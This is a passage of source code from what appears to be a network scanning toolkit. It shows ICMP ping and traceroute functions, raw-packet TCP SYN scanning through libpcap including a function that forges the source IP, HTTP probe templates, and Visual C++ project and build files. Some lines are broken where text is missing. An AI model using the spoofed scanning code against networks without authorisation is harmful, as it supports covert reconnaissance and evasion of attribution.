target_network,unsigned long target_network_subnet) { 92 | ping_list result; 93 | } 94 | 95 | tracert_list scan_icmp_tracert(const char* target_ip) { 96 | tracert_list result; 97 | IPAddr target_addr=(IPAddr)inet_addr(target_ip); 98 | icmp_echo_reply reply={0}; 99 | ip_option_information icmp_options; 100 | icmp_options.Flags=0; 101 | icmp_options.OptionsData=NULL; 102 | icmp_options.OptionsSize=0; 103 | icmp_options.Tos=0; 104 | unsigned int lost_ping_index=0; 105 | 106 | for (unsigned index=1;index<=255;++index) { 107 | icmp_options.Ttl=index; 108 | fIcmpSendEcho(fHandle,target_addr,NULL,0,&icmp_options,(LPVOID)&reply,sizeof(icmp_echo_reply),ICMP_PING_TIMEOUT); 109 | 110 | in_addr addr; 111 | addr.S_un.S_addr=reply.Address; 112 | if (ICMP_TTL_TRANSIT==reply.Status) { 113 | result.push_back(inet_ntoa(addr)); 114 | lost_ping_index=0; 115 | } else if (!reply.Status) { 116 | result.push_back(inet_ntoa(addr)); 117 | break; 118 | } else { 119 | result.push_back("*"); 120 | ++lost_ping_index; 121 | 122 | if (lost_ping_index>=6) 123 | break; 124 | } 125 | } 126 | return result; 127 | } 128 | 129 | void scan_icmp_clean(void) { 130 | fIcmpCloseHandle(fHandle); 131 | FreeLibrary (lModl); 132 | lModl=NULL; 133 | fIcmpCreateFile =NULL; 134 | fIcmpSendEcho =NULL; 135 | fIcmpCloseHandle =NULL; 136 | } 137 | -------------------------------------------------------------------------------- /scanner_framework/scan_icmp.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_ICMP_H__ 3 | #define _SCAN_ICMP_H__ 4 | 5 | #ifndef _STRING_ 6 | 7 | #include 8 | 9 | using std::string; 10 | 11 | #endif 12 | 13 | #ifndef _VECTOR_ 14 | 15 | #include 16 | 17 | using std::vector; 18 | 19 | #endif 20 | 21 | #define ICMP_PING_LOOP_COUNT 4 22 | #define ICMP_PING_TIMEOUT 5000 23 | 24 | typedef vector tracert_list; 25 | typedef struct { 26 | unsigned int count; 27 | unsigned int lost; 28 | unsigned int delay; 29 | } reply; 30 | 31 | typedef struct { 32 | string ip; 33 | reply ping_reply; 34 | } reply_ip; 35 | typedef vector ping_list; 36 | 37 | bool scan_icmp_init(void); 38 | bool scan_icmp(const char* target_ip,reply* output_information); 39 | ping_list scan_icmp_list(const char* target_network,unsigned long target_network_subnet); 40 | tracert_list scan_icmp_tracert(const char* target_ip); 41 | void scan_icmp_clean(void); 42 | 43 | #endif 44 | -------------------------------------------------------------------------------- /scanner_framework/scan_tcp.cpp: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | 8 | #include 9 | 10 | #include "local_network.h" 11 | #include "scan_arp.h" 12 | #include "scan_tcp.h" 13 | #include "scan_tcp_header.h" 14 | 15 | using std::string; 16 | 17 | #define ETH_ADDRESS_LENGTH 6 18 | #define ETH_PROTO_IP 0x800 19 | 20 | #pragma pack(1) 21 | 22 | typedef struct { 23 | unsigned char dest[ETH_ADDRESS_LENGTH]; 24 | unsigned char source[ETH_ADDRESS_LENGTH]; 25 | unsigned short proto; 26 | } eth_header,*point_eth_header; 27 | 28 | typedef struct { 29 | unsigned char h_lenver; 30 | unsigned char tos; 31 | unsigned short total_len; 32 | unsigned short ident; 33 | unsigned short frag_and_flags; 34 | unsigned char ttl; 35 | unsigned char proto; 36 | unsigned short checksum; 37 | unsigned int sourceIP; 38 | unsigned int destIP; 39 | } ip_header,*point_ip_header; 40 | 41 | #define TH_FIN 0x01 42 | #define TH_SYN 0x02 43 | #define TH_RST 0x04 44 | #define TH_PUSH 0x08 45 | #define TH_ACK 0x10 46 | #define TH_URG 0x20 47 | 48 | typedef struct { 49 | unsigned short th_sorc_port; 50 | unsigned short th_dest_port; 51 | unsigned int th_seq; 52 | unsigned int th_ack; 53 | unsigned char th_length; 54 | unsigned char th_flags; 55 | unsigned short th_win; 56 | unsigned short th_sum; 57 | unsigned short th_urp; 58 | } tcp_header,*point_tcp_header; 59 | 60 | typedef struct { 61 | unsigned long sorc_addr; 62 | unsigned long dest_addr; 63 | unsigned char mbz; 64 | unsigned char protocal; 65 | unsigned short length; 66 | } tcp_psdheader,*point_tcp_psdheader; 67 | 68 | #pragma pack(4) 69 | 70 | static pcap_t* adapter=NULL; 71 | 72 | static unsigned short checksum( unsigned short *buf, int size) { 73 | unsigned long cksum = 0; 74 | while( size > 1) { 75 | cksum += *buf++; 76 | size -= sizeof( unsigned short); 77 | } 78 | 79 | if(size) 80 | cksum += *( unsigned char *)buf; 81 | 82 | cksum = ( cksum >> 16) + ( cksum & 0xffff); 83 | cksum += (cksum >>16); 84 | return ( unsigned short)(~cksum); 85 | } 86 | 87 | static bool check_subnet(const char* targe_ip) { 88 | string local(local_ip); 89 | string remote(targe_ip); 90 | 91 | local=local.substr(0,local.find_last_of(".")); 92 | remote=remote.substr(0,remote.find_last_of(".")); 93 | 94 | if (local==remote) 95 | return true; 96 | return false; 97 | } 98 | 99 | unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port) { 100 | if (NULL==target_ip || !(0port=target_port; 190 | output_data->proto[0]='H'; 191 | output_data->data_length=recv_length; 192 | output_data->data=recv_buffer; 193 | scan_tcp_disconnect(tcp_handle); 194 | return true; 195 | } 196 | memset(recv_packet_buffer,0,PACKET_RECV_BUFFER); 197 | } 198 | 199 | free(recv_buffer); 200 | scan_tcp_disconnect(tcp_handle); 201 | } 202 | return false; 203 | } 204 | 205 | bool scan_tcp_init(void) { 206 | pcap_if_t *devsin; 207 | pcap_if_t *d; 208 | int i=0; 209 | char errorbuf[PCAP_ERRBUF_SIZE]={0}; 210 | 211 | if (pcap_findalldevs(&devsin, errorbuf) == -1) 212 | return false; 213 | 214 | for(d=devsin, i=0; i< ADAPTER_INDEX-1 ;d=d->next, i++); 215 | 216 | if ((adapter= pcap_open_live(d->name, 65536, 1,1000, errorbuf )) == NULL) 217 | return false; 218 | return true; 219 | } 220 | 221 | bool scan_tcp_fake_ip(const char* target_ip,unsigned short target_port,const char* fake_ip,unsigned short fake_port) { 222 | 223 | if (NULL!=adapter) { 224 | char remote_mac[ETH_ADDRESS_LENGTH]={0}; 225 | if (check_subnet(target_ip)) { 226 | if (!scan_arp(target_ip,remote_mac)) 227 | return false; 228 | } else 229 | memcpy(remote_mac,gateway_mac,ETH_ADDRESS_LENGTH); 230 | 231 | char send_packet_options[]={0x02,0x04,0x05,0xb4,0x01,0x03,0x03,0x02,0x01,0x01,0x04,0x02}; 232 | char send_packet[PACKET_SEND_BUFFER]={0}; 233 | char recv_packet[PACKET_RECV_BUFFER]={0}; 234 | char send_packet_calcu_checksum[PACKET_RECV_BUFFER]={0}; 235 | 236 | point_eth_header eth_header_=(point_eth_header)send_packet; 237 | memcpy(eth_header_->source,local_mac,ETH_ADDRESS_LENGTH); 238 | memcpy(eth_header_->dest,remote_mac,ETH_ADDRESS_LENGTH); 239 | eth_header_->proto=htons(ETH_PROTO_IP); 240 | 241 | point_ip_header ip_header_=(point_ip_header)(send_packet+sizeof(eth_header)); 242 | ip_header_->h_lenver=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); 243 | ip_header_->total_len=htons(sizeof(ip_header)+sizeof(tcp_header)+sizeof(send_packet_options)); 244 | ip_header_->ident=10; 245 | ip_header_->frag_and_flags=1<<6; 246 | ip_header_->ttl=128; 247 | ip_header_->proto=IPPROTO_TCP; 248 | ip_header_->sourceIP=inet_addr(fake_ip); 249 | ip_header_->destIP=inet_addr(target_ip); 250 | 251 | point_tcp_header tcp_header_=(point_tcp_header)(send_packet+sizeof(eth_header)+sizeof(ip_header)); 252 | tcp_header_->th_dest_port=htons(target_port); 253 | tcp_header_->th_sorc_port=htons(fake_port); 254 | tcp_header_->th_seq=0x1234432; 255 | tcp_header_->th_ack=0; 256 | tcp_header_->th_length=0x80; 257 | tcp_header_->th_flags=TH_SYN; 258 | tcp_header_->th_win=htons(4096); 259 | tcp_header_->th_urp=0; 260 | memcpy((void*)(send_packet+sizeof(eth_header)+sizeof(ip_header)+sizeof(tcp_header)),send_packet_options,sizeof(send_packet_options)); 261 | 262 | point_tcp_psdheader tcp_psdheader_=(point_tcp_psdheader)send_packet_calcu_checksum; 263 | tcp_psdheader_->dest_addr=inet_addr(target_ip); 264 | tcp_psdheader_->sorc_addr=inet_addr(fake_ip); 265 | tcp_psdheader_->mbz=0; 266 | tcp_psdheader_->protocal=IPPROTO_TCP; 267 | tcp_psdheader_->length=htons(sizeof(tcp_header)+sizeof(send_packet_options)); 268 | memcpy(&send_packet_calcu_checksum[sizeof(tcp_psdheader)],tcp_header_,sizeof(tcp_header)); 269 | memcpy(&send_packet_calcu_checksum[sizeof(tcp_psdheader)+sizeof(tcp_header)],send_packet_options,sizeof(send_packet_options)); 270 | tcp_header_->th_sum=checksum((unsigned short*)send_packet_calcu_checksum,sizeof(tcp_psdheader)+sizeof(tcp_header)+sizeof(send_packet_options)); 271 | ip_header_->checksum=checksum((unsigned short*)ip_header_,sizeof(ip_header)); 272 | 273 | pcap_sendpacket(adapter,(const unsigned char *)send_packet,sizeof(eth_header)+sizeof(ip_header)+sizeof(tcp_header)+sizeof(send_packet_options)); 274 | 275 | unsigned long old_tick=GetTickCount(); 276 | unsigned long new_tick=old_tick; 277 | do { 278 | pcap_pkthdr* header=NULL; 279 | unsigned char* data=NULL; 280 | int return_code=pcap_next_ex(adapter,&header,(const unsigned char**)&data); 281 | 282 | if (-1==return_code || 0==return_code) continue; 283 | eth_header_=(point_eth_header)data; 284 | if (htons(ETH_PROTO_IP)==eth_header_->proto) { 285 | ip_header_=(point_ip_header)(data+sizeof(eth_header)); 286 | tcp_header_=(point_tcp_header)(data+sizeof(eth_header)+sizeof(ip_header)); 287 | if (inet_addr(target_ip)==ip_header_->sourceIP && IPPROTO_TCP==ip_header_->proto && htons(target_port)==tcp_header_->th_sorc_port) 288 | if ((tcp_header_->th_flags & TH_SYN) && (tcp_header_->th_flags & TH_ACK)) 289 | return true; 290 | } 291 | new_tick=GetTickCount(); 292 | } while ((new_tick-old_tick)<=SCAN_TCP_PORT_TIMEOUT); 293 | } 294 | return false; 295 | } 296 | 297 | bool scan_tcp(const char* target_ip,unsigned short target_port) { 298 | return scan_tcp_fake_ip(target_ip,target_port,local_ip,SCAN_TCP_PORT); 299 | } 300 | 301 | void scan_tcp_clean(void) { 302 | pcap_close(adapter); 303 | adapter=NULL; 304 | } 305 | -------------------------------------------------------------------------------- /scanner_framework/scan_tcp.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_TCP_H__ 3 | #define _SCAN_TCP_H__ 4 | 5 | #define ADAPTER_INDEX 1 6 | 7 | #define PACKET_SEND_BUFFER 1024 8 | #define PACKET_RECV_BUFFER 1024 9 | #define PAGE_BUFFER_LENGTH 1024*10 10 | 11 | #define SCAN_TCP_PORT_TIMEOUT 500 12 | #define SCAN_TCP_GET_DATA_TIME 5000 13 | 14 | #define SCAN_TCP_PORT 443 // https 15 | 16 | typedef struct { 17 | unsigned short port; 18 | char proto[10]; 19 | unsigned int data_length; 20 | char* data; 21 | } scan_tcp_port_information; 22 | 23 | bool scan_tcp_init(void); 24 | bool scan_tcp(const char* target_ip,unsigned short target_port); 25 | bool scan_tcp_fake_ip(const char* target_ip,unsigned short target_port,const char* fake_ip,unsigned short fake_port); 26 | bool scan_tcp_get_data(const char* target_ip,unsigned short target_port,const char* path,const char* target_host,scan_tcp_port_information* output_data); 27 | void scan_tcp_clean(void); 28 | 29 | unsigned int scan_tcp_bind(unsigned short local_port); 30 | unsigned int scan_tcp_accept(unsigned int tcp_handle); 31 | unsigned int scan_tcp_connect(const char* target_ip,unsigned short target_port); 32 | bool scan_tcp_set_recv_block(unsigned int tcp_handle,unsigned int block_time); 33 | void scan_tcp_send(unsigned int tcp_handle,const char* buffer,unsigned int buffer_length); 34 | unsigned int scan_tcp_recv(unsigned int tcp_handle,char* buffer,unsigned int buffer_length); 35 | void scan_tcp_disconnect(unsigned int tcp_handle); 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /scanner_framework/scan_tcp_header.h: -------------------------------------------------------------------------------- 1 | 2 | #ifndef _SCAN_TCP_HEADER_H__ 3 | #define _SCAN_TCP_HEADER_H__ 4 | 5 | #define SCAN_TCP_HEADER_HTTP "GET %s HTTP/1.1\r\n" \ 6 | "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0\r\n\r\n" 7 | #define SCAN_TCP_HEADER_HTTP_HOST "GET %s HTTP/1.1\r\n" \ 8 | "HOST: %s\r\n" \ 9 | "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:37.0) Gecko/20100101 Firefox/37.0\r\n\r\n" 10 | #define SCAN_TCP_HEADER_TELNET "" 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /scanner_framework/scanner_framework.dsp: -------------------------------------------------------------------------------- 1 | # Microsoft Developer Studio Project File - Name="scanner_framework" - Package Owner=<4> 2 | # Microsoft Developer Studio Generated Build File, Format Version 6.00 3 | # ** DO NOT EDIT ** 4 | 5 | # TARGTYPE "Win32 (x86) Console Application" 0x0103 6 | 7 | CFG=scanner_framework - Win32 Debug 8 | !MESSAGE This is not a valid makefile. To build this project using NMAKE, 9 | !MESSAGE use the Export Makefile command and run 10 | !MESSAGE 11 | !MESSAGE NMAKE /f "scanner_framework.mak". 12 | !MESSAGE 13 | !MESSAGE You can specify a configuration when running NMAKE 14 | !MESSAGE by defining the macro CFG on the command line. For example: 15 | !MESSAGE 16 | !MESSAGE NMAKE /f "scanner_framework.mak" CFG="scanner_framework - Win32 Debug" 17 | !MESSAGE 18 | !MESSAGE Possible choices for configuration are: 19 | !MESSAGE 20 | !MESSAGE "scanner_framework - Win32 Release" (based on "Win32 (x86) Console Application") 21 | !MESSAGE "scanner_framework - Win32 Debug" (based on "Win32 (x86) Console Application") 22 | !MESSAGE 23 | 24 | # Begin Project 25 | # PROP AllowPerConfigDependencies 0 26 | # PROP Scc_ProjName "" 27 | # PROP Scc_LocalPath "" 28 | CPP=cl.exe 29 | RSC=rc.exe 30 | 31 | !IF "$(CFG)" == "scanner_framework - Win32 Release" 32 | 33 | # PROP BASE Use_MFC 0 34 | # PROP BASE Use_Debug_Libraries 0 35 | # PROP BASE Output_Dir "Release" 36 | # PROP BASE Intermediate_Dir "Release" 37 | # PROP BASE Target_Dir "" 38 | # PROP Use_MFC 0 39 | # PROP Use_Debug_Libraries 0 40 | # PROP Output_Dir "Release" 41 | # PROP Intermediate_Dir "Release" 42 | # PROP Ignore_Export_Lib 0 43 | # PROP Target_Dir "" 44 | # ADD BASE CPP /nologo /W3 /GX /O2 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 45 | # ADD CPP /nologo /W3 /GX /O1 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /c 46 | # ADD BASE RSC /l 0x804 /d "NDEBUG" 47 | # ADD RSC /l 0x804 /d "NDEBUG" 48 | BSC32=bscmake.exe 49 | # ADD BASE BSC32 /nologo 50 | # ADD BSC32 /nologo 51 | LINK32=link.exe 52 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386 53 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /machine:I386 54 | 55 | !ELSEIF "$(CFG)" == "scanner_framework - Win32 Debug" 56 | 57 | # PROP BASE Use_MFC 0 58 | # PROP BASE Use_Debug_Libraries 1 59 | # PROP BASE Output_Dir "Debug" 60 | # PROP BASE Intermediate_Dir "Debug" 61 | # PROP BASE Target_Dir "" 62 | # PROP Use_MFC 0 63 | # PROP Use_Debug_Libraries 1 64 | # PROP Output_Dir "Debug" 65 | # PROP Intermediate_Dir "Debug" 66 | # PROP Target_Dir "" 67 | # ADD BASE CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 68 | # ADD CPP /nologo /W3 /Gm /GX /ZI /Od /D "WIN32" /D "_DEBUG" /D "_CONSOLE" /D "_MBCS" /YX /FD /GZ /c 69 | # ADD BASE RSC /l 0x804 /d "_DEBUG" 70 | # ADD RSC /l 0x804 /d "_DEBUG" 71 | BSC32=bscmake.exe 72 | # ADD BASE BSC32 /nologo 73 | # ADD BSC32 /nologo 74 | LINK32=link.exe 75 | # ADD BASE LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 76 | # ADD LINK32 kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /debug /machine:I386 /pdbtype:sept 77 | 78 | !ENDIF 79 | 80 | # Begin Target 81 | 82 | # Name "scanner_framework - Win32 Release" 83 | # Name "scanner_framework - Win32 Debug" 84 | # Begin Group "Source Files" 85 | 86 | # PROP Default_Filter "cpp;c;cxx;rc;def;r;odl;idl;hpj;bat" 87 | # Begin Source File 88 | 89 | SOURCE=.\encoder_base64.cpp 90 | # End Source File 91 | # Begin Source File 92 | 93 | SOURCE=.\local_information.cpp 94 | # End Source File 95 | # Begin Source File 96 | 97 | SOURCE=.\local_network.cpp 98 | # End Source File 99 | # Begin Source File 100 | 101 | SOURCE=.\local_thread.cpp 102 | # End Source File 103 | # Begin Source File 104 | 105 | SOURCE=.\main.cpp 106 | # End Source File 107 | # Begin Source File 108 | 109 | SOURCE=.\network_crack.cpp 110 | # End Source File 111 | # Begin Source File 112 | 113 | SOURCE=.\network_encoder.cpp 114 | # End Source File 115 | # Begin Source File 116 | 117 | SOURCE=.\network_route.cpp 118 | # End Source File 119 | # Begin Source File 120 | 121 | SOURCE=.\network_server_dns.cpp 122 | # End Source File 123 | # Begin Source File 124 | 125 | SOURCE=.\resolver_dictionary.cpp 126 | # End Source File 127 | # Begin Source File 128 | 129 | SOURCE=.\resolver_express.cpp 130 | # End Source File 131 | # Begin Source File 132 | 133 | SOURCE=.\resolver_html.cpp 134 | # End Source File 135 | # Begin Source File 136 | 137 | SOURCE=.\resolver_http.cpp 138 | # End Source File 139 | # Begin Source File 140 | 141 | SOURCE=.\resolver_string.cpp 142 | # End Source File 143 | # Begin Source File 144 | 145 | SOURCE=.\scan_arp.cpp 146 | # End Source File 147 | # Begin Source File 148 | 149 | SOURCE=.\scan_icmp.cpp 150 | # End Source File 151 | # Begin Source File 152 | 153 | SOURCE=.\scan_tcp.cpp 154 | # End Source File 155 | # End Group 156 | # Begin Group "Header Files" 157 | 158 | # PROP Default_Filter "h;hpp;hxx;hm;inl" 159 | # Begin Source File 160 | 161 | SOURCE=.\encoder_base64.h 162 | # End Source File 163 | # Begin Source File 164 | 165 | SOURCE=.\local_information.h 166 | # End Source File 167 | # Begin Source File 168 | 169 | SOURCE=.\local_network.h 170 | # End Source File 171 | # Begin Source File 172 | 173 | SOURCE=.\local_thread.h 174 | # End Source File 175 | # Begin Source File 176 | 177 | SOURCE=.\network_crack.h 178 | # End Source File 179 | # Begin Source File 180 | 181 | SOURCE=.\network_dictionary.h 182 | # End Source File 183 | # Begin Source File 184 | 185 | SOURCE=.\network_encoder.h 186 | # End Source File 187 | # Begin Source File 188 | 189 | SOURCE=.\network_route.h 190 | # End Source File 191 | # Begin Source File 192 | 193 | SOURCE=.\network_server_dns.h 194 | # End Source File 195 | # Begin Source File 196 | 197 | SOURCE=.\resolver_dictionary.h 198 | # End Source File 199 | # Begin Source File 200 | 201 | SOURCE=.\resolver_express.h 202 | # End Source File 203 | # Begin Source File 204 | 205 | SOURCE=.\resolver_html.h 206 | # End Source File 207 | # Begin Source File 208 | 209 | SOURCE=.\resolver_http.h 210 | # End Source File 211 | # Begin Source File 212 | 213 | SOURCE=.\resolver_string.h 214 | # End Source File 215 | # Begin Source File 216 | 217 | SOURCE=.\scan_arp.h 218 | # End Source File 219 | # Begin Source File 220 | 221 | SOURCE=.\scan_icmp.h 222 | # End Source File 223 | # Begin Source File 224 | 225 | SOURCE=.\scan_tcp.h 226 | # End Source File 227 | # Begin Source File 228 | 229 | SOURCE=.\scan_tcp_header.h 230 | # End Source File 231 | # End Group 232 | # Begin Group "Resource Files" 233 | 234 | # PROP Default_Filter "ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe" 235 | # End Group 236 | # End Target 237 | # End Project 238 | -------------------------------------------------------------------------------- /scanner_framework/scanner_framework.dsw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.dsw -------------------------------------------------------------------------------- /scanner_framework/scanner_framework.ncb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.ncb -------------------------------------------------------------------------------- /scanner_framework/scanner_framework.opt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/network_backdoor_scanner/6d590e59ef48c6bebc127f0f92192a7584a63e04/scanner_framework/scanner_framework.opt -------------------------------------------------------------------------------- /scanner_framework/scanner_framework.plg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 
 4 | 
Build Log

 5 | 

 6 | --------------------Configuration: scanner_framework - Win32 Release--------------------
 7 | 

 8 | 
Command Lines

 9 | Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB67.tmp" with contents
10 | [
11 | /nologo /ML /W3 /GX /O1 /D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" /Fp"Release/scanner_framework.pch" /YX /Fo"Release/" /Fd"Release/" /FD /c 
12 | "C:\Users\Administrator\Desktop\code_file\scaner\scanner_framework\main.cpp"
13 | ]
14 | Creating command line "cl.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB67.tmp" 
15 | Creating temporary file "C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB68.tmp" with contents
16 | [
17 | kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /subsystem:console /incremental:no /pdb:"Release/scanner_framework.pdb" /machine:I386 /out:"Release/scanner_framework.exe" 
18 | .\Release\encoder_base64.obj
19 | .\Release\local_network.obj
20 | .\Release\main.obj
21 | .\Release\network_crack.obj
22 | .\Release\network_encoder.obj
23 | .\Release\network_route.obj
24 | .\Release\network_server_dns.obj
25 | .\Release\resolver_dictionary.obj
26 | .\Release\resolver_express.obj
27 | .\Release\resolver_html.obj
28 | .\Release\resolver_http.obj
29 | .\Release\resolver_string.obj
30 | .\Release\scan_arp.obj
31 | .\Release\scan_icmp.obj
32 | .\Release\scan_tcp.obj
33 | .\Release\local_information.obj
34 | ]
35 | Creating command line "link.exe @C:\Users\ADMINI~1\AppData\Local\Temp\RSPBB68.tmp"
36 | 
Output Window

37 | Compiling...
38 | main.cpp
39 | Linking...
40 | 
41 | 
42 | 
43 | 
Results

44 | scanner_framework.exe - 0 error(s), 0 warning(s)
45 |
46 | 47 | 48 | --------------------------------------------------------------------------------